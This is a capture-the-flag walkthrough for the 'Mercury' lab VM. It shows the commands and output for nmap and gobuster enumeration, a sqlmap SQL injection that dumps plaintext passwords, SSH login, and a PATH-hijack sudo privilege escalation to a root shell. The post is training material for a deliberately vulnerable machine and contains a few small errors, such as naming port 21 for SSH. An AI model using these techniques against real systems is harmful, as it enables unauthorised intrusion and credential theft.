Table of Contents
Mercury is an easy Box though you will likely Capture the Flag (CTF) and be on the harder side of easy, depending on your experience.
You can easily set up the server to VirtualBox, simply click on import, and then import the file. It will automatically initiate an instance. Once you are done with these, click on setting and change the network adapter to the host-only adapter.
.png)
Enumeration
The instances are ready and we are on Kali Linux. Let's find out the IP address of the Mercury server by using netdiscover.
┌─[mrdev@TS]─[~]
└──╼ $
sudo netdiscover -i vboxnet0
Currently scanning: 192.168.77.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:d9:32:46 1 42 PCS Systemtechnik GmbH
192.168.56.105 08:00:27:18:54:5e 1 60 PCS Systemtechnik GmbH
We have discovered an IP address, so let's Perform a network scan to detect what ports are open is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks.
As in most cases, we are going to use the famous Nmap tool.
Conducting Network Scans with Nmap
- -sV: Enables version detection, which will detect what versions are running on what port.
┌─[✗]─[mrdev@TS]─[~]
└──╼ $
nmap -sV 192.168.56.105
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 19:53 IST
Nmap scan report for 192.168.56.105
Host is up (0.077s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=1/26%Time=61F1595B%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2026\x20Jan\x202
SF:022\x2014:23:22\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.2
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x2
SF:0DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r\
SF:nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\x
SF:20currently\x20in\x20development\x20please\x20check\x20back\x20later\."
SF:)%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2026\x20J
SF:an\x202022\x2014:23:22\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/
SF:3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opti
SF:ons:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\
SF:x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20l
SF:ater\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DT
SF:D\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\
SF:.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20cont
SF:ent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<titl
SF:e>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<
SF:body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP/
SF:1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expl
SF:anation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x2
SF:0or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n"
SF:)%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x2
SF:0Wed,\x2026\x20Jan\x202022\x2014:23:22\x20GMT\r\nServer:\x20WSGIServer/
SF:0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Option
SF:s:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20nos
SF:niff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<htm
SF:l\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\"
SF:\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20no
SF:t\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x20
SF:<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<style
SF:\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\x
SF:20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x2020
SF:px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x2
SF:0\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee;
SF:\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1p
SF:x\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:normal
SF:;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20font
SF:-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x20
SF:table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:10
SF:0%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.60 seconds
┌─[mrdev@TS]─[~]
└──╼ $
From the network scan(Nmap), we have spotted 2 open ports.
- Port 22/TCP runs an ssh service, which means, that if you have a valid credential then it will be easy to gain login access to the server.
- Port 8080/TCP runs an HTTP-proxy service, which indicates that there is a website running state.
To look at the contents ourselves, we can open a web browser of our choice and navigate to the target's IP address along with port 8080 in the URL bar at the top of the window:
.png)
This might be in the developing stage and there is nothing to enumerate on the webpage. There might be any hidden or hardly accessible directories and pages, and that can be done through directory busting.
Performing Directory Enumeration with Gobuster
- dir : Uses directory/file enumeration mode.
- -u : The target URL.
- -w : Path to the wordlist.
┌─[mrdev@TS]─[~]
└──╼ $
gobuster dir -u http://192.168.56.105:8080/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.105:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/26 19:57:08 Starting gobuster in directory enumeration mode
===============================================================
/robots.txt
(Status: 200) [Size: 26]
===============================================================
2022/01/26 19:58:41 Finished
===============================================================
┌─[mrdev@TS]─[~]
└──╼ $
As a result of Directory busting, we obtained an important file i.e., robots.txt. Let’s dig into this directory and find out if there is any sensitive information that might help us in foothold.
.png)
Foothold
After analyzing the robots.txt file, we have finalized that there is an error page, which can be accessed through an asterisk(*).
.png)
This error page may be indicated in another directory. So, let’s access the identified folder “mercuryfacts/” on the browser.
.png)
On accessing the mercury facts directory, we found a hyperlink consisting of a fact (Load a fact). So, now, click on load a fact. It will redirect to another page.
.png)
By checking the URL, we conclude that there may be a variable ID that is responsible for all these. We could test it to see if it's SQL injectable, but instead of doing it manually, we will use a tool called sqlmap.
Database Enumeration with SQLMap
Sqlmap comes pre-installed with Kali Linux and ParrotSec OS.
┌─[mrdev@TS]─[~]
└──╼ $
sqlmap --help
___
__H__
___ ___["]_____ ___ ___ {1.5.12#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
┌─[mrdev@TS]─[~]
└──╼ $
Now open your terminal and type the following command.
- There will be some questions that the tool will ask you, you can respond with 'Yes ' or 'No', or just by pressing ENTER for the default answer.
┌─[mrdev@TS]─[~]
└──╼ $
sqlmap -u http://192.168.56.105:8080/mercuryfacts/1/
___
__H__
___ ___["]_____ ___ ___ {1.5.12#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:01:40 /2022-01-26/
[20:01:41] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] y
[20:01:46] [INFO] testing connection to the target URL
[20:01:46] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[20:01:46] [INFO] testing if the target URL content is stable
[20:01:46] [INFO] target URL content is stable
[20:01:46] [INFO] testing if URI parameter '#1*' is dynamic
[20:01:47] [WARNING] URI parameter '#1*' does not appear to be dynamic
[20:01:47] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:01:47] [INFO] testing for SQL injection on URI parameter '#1*'
[20:01:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:01:47] [WARNING] reflective value(s) found and filtering out
[20:01:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:01:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:01:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:01:49] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:01:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:01:49] [INFO] testing 'Generic inline queries'
[20:01:49] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:01:49] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:01:49] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:01:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:01:50] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:01:50] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[20:01:50] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n
[20:02:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:02:03] [WARNING] URI parameter '#1*' does not seem to be injectable
[20:02:03] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[20:02:03] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 123 times
[*] ending @ 20:02:03 /2022-01-26/
┌─[mrdev@TS]─[~]
└──╼ $
After analyzing the output, we confirm that this server is vulnerable to SQL injection flaws and is in a critical situation, but the id parameter seems not to be injectable.
Let's list information about the existing databases. So firstly, we have to enter the web URL that we want to check along with the -u parameter.
Now typically, we would want to test whether it is possible to gain access to a database. So we use the --dbs option to do so.
- --dbs, lists all the available databases.
- --batch is used to never ask for user input, use the default behavior.
This application will tell you that it has identified the database, and ask whether you want to test other database types. You can go ahead and type ‘Y’. Further, it may ask whether you want to test other parameters for vulnerabilities, type ‘Y’ over here as we want to thoroughly test the web application.
┌─[mrdev@TS]─[~]
└──╼ $
sqlmap -u http://192.168.56.105:8080/mercuryfacts/ --dbs --batch
___
__H__
___ ___[.]_____ ___ ___ {1.5.12#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:03:43 /2022-01-26/
[20:03:43] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[20:03:43] [INFO] resuming back-end DBMS 'mysql'
[20:03:43] [INFO] testing connection to the target URL
[20:03:44] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: http://192.168.56.105:8080/mercuryfacts/GTID_SUBSET(CONCAT(0x7176767a71,(SELECT (ELT(6796=6796,1))),0x7170716a71),6796)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.56.105:8080/mercuryfacts/(CASE WHEN (6894=6894) THEN SLEEP(5) ELSE 6894 END)
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: http://192.168.56.105:8080/mercuryfacts/-4104 UNION ALL SELECT CONCAT(0x7176767a71,0x544e436b4f47426547734f6c544b7141476b734b654b436d6a79466969666d454b46496f4f5a506b,0x7170716a71)#
---
[20:03:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[20:03:44] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] mercury
[20:03:44] [INFO] fetched data logged to text files under '/home/mrdev/.local/share/sqlmap/output/192.168.56.105'
[*] ending @ 20:03:44 /2022-01-26/
┌─[mrdev@TS]─[~]
└──╼ $
The output shows us that there are two available databases. We observe that there are two databases, information_schema, and mercury.
Now, List information about Tables present in a particular Database
To try and access any of the databases, we have to slightly modify our command. We now use -D to specify the name of the database that we wish to access, and once we have access to the database, we want to see whether we can dump all DBMS database table entries. For this, we use the --dump-all query.
┌─[mrdev@TS]─[~]
└──╼ $
sqlmap -u http://192.168.56.105:8080/mercuryfacts/ -D mercury --dump-all --batch
___
__H__
___ ___[)]_____ ___ ___ {1.5.12#stable}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:04:59 /2022-01-26/
[20:04:59] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[20:04:59] [INFO] resuming back-end DBMS 'mysql'
[20:04:59] [INFO] testing connection to the target URL
[20:05:00] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
Payload: http://192.168.56.105:8080/mercuryfacts/GTID_SUBSET(CONCAT(0x7176767a71,(SELECT (ELT(6796=6796,1))),0x7170716a71),6796)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: http://192.168.56.105:8080/mercuryfacts/(CASE WHEN (6894=6894) THEN SLEEP(5) ELSE 6894 END)
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: http://192.168.56.105:8080/mercuryfacts/-4104 UNION ALL SELECT CONCAT(0x7176767a71,0x544e436b4f47426547734f6c544b7141476b734b654b436d6a79466969666d454b46496f4f5a506b,0x7170716a71)#
---
[20:05:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[20:05:00] [INFO] fetching tables for database: 'mercury'
[20:05:00] [INFO] fetching columns for table 'facts' in database 'mercury'
[20:05:00] [INFO] fetching entries for table 'facts' in database 'mercury'
Database: mercury
Table: facts
[8 entries]
+----+--------------------------------------------------------------+
| id | fact |
+----+--------------------------------------------------------------+
| 1 | Mercury does not have any moons or rings. |
| 2 | Mercury is the smallest planet. |
| 3 | Mercury is the closest planet to the Sun. |
| 4 | Your weight on Mercury would be 38% of your weight on Earth. |
| 5 | A day on the surface of Mercury lasts 176 Earth days. |
| 6 | A year on Mercury takes 88 Earth days. |
| 7 | It's not known who discovered Mercury. |
| 8 | A year on Mercury is just 88 days long. |
+----+--------------------------------------------------------------+
[20:05:00] [INFO] table 'mercury.facts' dumped to CSV file '/home/mrdev/.local/share/sqlmap/output/192.168.56.105/dump/mercury/facts.csv'
[20:05:00] [INFO] fetching columns for table 'users' in database 'mercury'
[20:05:00] [INFO] fetching entries for table 'users' in database 'mercury'
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password | username |
+----+-------------------------------+-----------+
| 1 | johnny1987 | john |
| 2 | lovemykids111 | laura |
| 3 | lovemybeer111 | sam |
| 4 | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+
[20:05:00] [INFO] table 'mercury.users' dumped to CSV file '/home/mrdev/.local/share/sqlmap/output/192.168.56.105/dump/mercury/users.csv'
[20:05:00] [INFO] fetched data logged to text files under '/home/mrdev/.local/share/sqlmap/output/192.168.56.105'
[*] ending @ 20:05:00 /2022-01-26/
┌─[mrdev@TS]─[~]
└──╼ $
From the output, We have got a few usernames and passwords. As we already know, there is an SSH service running on port 21.
Establishing Secure Remote Connections with SSH
Let's perform a Secure shell connection to enable secure remote connections using these usernames and their relevant passwords.
┌─[mrdev@TS]─[~]
└──╼ $
ssh [email protected]
┌─[mrdev@TS]─[~]
└──╼ $ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 26 Jan 14:37:41 UTC 2022
System load: 0.11 Processes: 101
Usage of /: 67.4% of 4.86GB Users logged in: 0
Memory usage: 57% IPv4 address for enp0s3: 192.168.56.105
Swap usage: 0%
22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$
Next, use the ls command to list the files and the directories' contents. As a result, we found user_flag.txt, opened this using the cat command.
┌─[mrdev@TS]─[~]
└──╼ $
ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 26 Jan 14:37:41 UTC 2022
System load: 0.11 Processes: 101
Usage of /: 67.4% of 4.86GB Users logged in: 0
Memory usage: 57% IPv4 address for enp0s3: 192.168.56.105
Swap usage: 0%
22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$
ls
mercury_proj
user_flag.txt
webmaster@mercury:~$
cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]
Privilege Escalation
Let's identify the rights and privileges of the current user by executing the sudo -l command.
webmaster@mercury:~$
sudo -l
[sudo] password for webmaster:
Sorry, user webmaster may not run sudo on mercury.
webmaster@mercury:~$
We got an output, which is the user Mercury doesn't have permission to run the sudo command.
After analyzing, we have discovered a directory that may contain some sensitive information. Let's change the directory to the mercury project directory.
webmaster@mercury:~$
cd mercury_proj/
webmaster@mercury:~/mercury_proj$
Now run the ls command to list the files and directories. There is a text file, let's see what is there in this file.
webmaster@mercury:~/mercury_proj$
ls
db.sqlite3 manage.py mercury_facts mercury_index mercury_proj
notes.txt
webmaster@mercury:~/mercury_proj$
Open this file with the cat command.
- This file contained some login strings, that seem to be base-64 encoded strings.
- We used the echo command to decode the base-64 string.
webmaster@mercury:~/mercury_proj$
cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$
echo "bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK" | base64 -d
mercuryisthesizeof0.056Earths
webmaster@mercury:~/mercury_proj$
echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d
mercurymeandiameteris4880km
webmaster@mercury:~/mercury_proj$
After successfully decoding these strings, we found a clear-text password for the user linuxmaster.
Let us login into the target machine using the user “linuxmaster”.
┌─[mrdev@TS]─[~]
└──╼ $
ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 26 Jan 14:37:41 UTC 2022
System load: 0.11 Processes: 101
Usage of /: 67.4% of 4.86GB Users logged in: 0
Memory usage: 57% IPv4 address for enp0s3: 192.168.56.105
Swap usage: 0%
22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
linuxmaster@mercury:~$
Now, again run sudo -l to identify the rights and privileges of the current user linuxmaster.
linuxmaster@mercury:~$
sudo -l
[sudo] password for linuxmaster:
Matching Defaults entries for linuxmaster on mercury:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User linuxmaster may run the following commands on mercury:
(root : root) SETENV:
/usr/bin/check_syslog.sh
linuxmaster@mercury:~$
There is a file that contains the root permission to the /usr/bin/check_syslog.sh.
- This means the current user owns sudo rights for the “check_syslog.sh” bash script. This is a part of the local privilege escalation.
Path Manipulation(Path Traversal) Privilege Escalation
Let’s use this file to escalate the current user privilege to root.
Firstly read the contents of the bash script, the script was written to execute the tail program for reading the last 10 Syslog entries.
As we know the check_syslog.sh could be run in the preserve Environment which means we can abuse the environment path variable
.
So, we tried to create a hard link or a symbolic link to an existing file or directory to the specified TARGET using the VI text editor. This could be done using the following commands.
linuxmaster@mercury:~$
cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
linuxmaster@mercury:~$
ln -s /usr/bin/vi tail
linuxmaster@mercury:~$
export PATH=$(pwd):$PATH
linuxmaster@mercury:~$
Once, you will execute the above command, further, you need to execute the following command that will execute "check_syslog.sh" in a preserve the environment which will link the VI editor to the tail program and open the " Syslog.sh " script in vi editor mode.
linuxmaster@mercury:~$
sudo --preserve-env=PATH /usr/bin/check_syslog.sh
On execution of this command, I got a prompt from the VI text editor. Now execute the :!/bin/bash and hit enter to get a root shell.
.png)
linuxmaster@mercury:~$
sudo --preserve-env=PATH /usr/bin/check_syslog.sh
2 files to edit
root@mercury:/home/linuxmaster#
You can find out the root flag by changing the directory to /root. Read this root flag using the cat command.
root@mercury:/home/linuxmaster#
cd /root
root@mercury:~#
ls
root_flag.txt
root@mercury:~#
cat root_flag.txt
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@
@@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@
@@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@
@@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@
@@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@
@@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@
@@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@
@@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@
@@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@
@@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@
@@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@
@@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@
@@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@
@@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@
@@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@
@@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@
@@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Congratulations on completing Mercury!!!
If you have any feedback please contact me at [email protected]
[root_flag_69426d9fda579afbffd9c2d47ca31d90]
root@mercury:~#
Congratulations! We have successfully captured the flag.
